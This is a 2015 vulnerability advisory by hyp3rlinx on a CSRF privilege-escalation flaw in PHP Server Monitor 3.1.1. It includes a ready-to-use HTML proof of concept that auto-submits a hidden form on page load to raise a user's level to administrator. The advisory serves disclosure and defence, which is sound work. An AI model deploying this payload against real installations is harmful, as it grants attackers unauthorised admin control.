<!--[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt
Vendor:================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download
Product:================================
PHP Server Monitor 3.1.1
Vulnerability Type:=================================
Privilege Escalation / CSRF
Vulnerability Details:=====================
PHP Server Monitor uses level 20for basic user and level 10for Admins these are stored in Database. Basic users can elevate thier privileges to that of Administrator
by crafting an HTTP payload changing their level to '10' then getting an Administrator to click an infected link or visit a malicious website to launch an
CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism in place.
Exploit code(s):===============1) privilege escalation / CSRF
--><!DOCTYPE><html><body onLoad="doit()"><script>
function doit(){
var e=document.getElementById('HELL')
e.submit()}</script><form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post"><inputtype="text" name="user_name" value="hyp3rlinx"><inputtype="text" name="name" value="hyp3rlinx"><inputtype="text" name="level" value="10"><inputtype="text" name="password" value=""><inputtype="text" name="password_repeat" value=""><inputtype="text" name="email" value="ghostofsin@abyss.com"><inputtype="text" name="mobile" value=""><inputtype="text" name="pushover_key" value=""><inputtype="text" name="pushover_device" value=""></form></body></html><!--
Exploitation Technique:=======================
Remote
Disclosure Timeline:=========================================================
Vendor Notification: NA
Oct 30,2015: Public Disclosure
Severity Level:=========================================================
High
Description:==========================================================
Request Method(s):[+]POST
Vulnerable Product:[+]PHP Server Monitor 3.1.1===========================================================[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it isnot altered except by reformatting it,and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author isnot responsible forany misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
-->